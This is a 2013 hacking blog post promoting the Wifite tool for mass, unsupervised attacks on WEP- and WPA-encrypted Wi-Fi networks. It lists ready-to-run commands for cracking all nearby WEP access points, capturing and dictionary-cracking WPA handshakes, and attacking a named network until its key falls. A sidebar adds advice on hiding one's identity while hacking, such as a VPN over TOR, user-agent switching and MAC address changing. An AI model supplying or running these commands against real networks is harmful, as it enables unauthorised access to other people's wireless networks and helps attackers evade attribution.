Ads 468x60px

Tuesday, April 16, 2013

Hack Into Wi-Fi (WEP and WPA Encrypted) Networks - Wifite

Wifite is made to attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments. wifite can be trusted to run without supervision. 

FULLY AUTOMATED MASS WPA / WEP WITH WIFITE AND CRACKING WITH OCLHASHCAT

The video below shows how the application works





Source :- http://code.google.com/p/wifite/


examples

the program contains lots of interactivity (waits for user input). these command-line options are meant to make the program 100% automated -- no supervision required. 
to crack all WEP access points: 

./wifite.py -all -nowpa
to crack all WEP access points with signal strength greater than (or equal to) 50dB: 
./wifite.py -p 50 -nowpa
to attack all access points, use 'darkc0de.lst' for cracking WPA handshakes: 
./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst
to attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically: 
./wifite.py -all -nowpa --dict none
to crack all WEP access points greater than 50dB in strength, giving 15 minutes for each WEP attack method, and send packets at 600 packets/sec: 
./wifite.py --power 50 -wepw 15 -pps 600
to attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrrupts with ^C): 
./wifite.py -e "2WIRE752" -wepw 0

Don't learn to HACK,hack to LEARN!!

IP

0 comments:

Post a Comment

 

Is TOR Secure??

TOR is not safe to hack!! With putting too much security in middle, you increase the risk of malicious traffic from end station going undetected through this tight-secure loop. It’s a general rule when traffic moves from higher trust to lower trust , the nature of protection provided on either ends should be evaluated and should it match with the data classification level it carries with in. try using some other vpns!!In particular if somebody can observe your traffic and your target's traffic, he can correlate that.

One interesting variant is connecting to a VPN over TOR. That helps with 3), provided you trust the VPN, but you need to figure out a way to buy VPN access anonymously.

Factors Affecting Anonymity Online

IP address- can be resolved by VPN's. User agent- https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/. MAC address - Technetium mac changer. For more information be have anonymous service online. Please visit http://prism-break.org/

Total Pageviews

Total Pageviews

Total Pageviews

Sample Text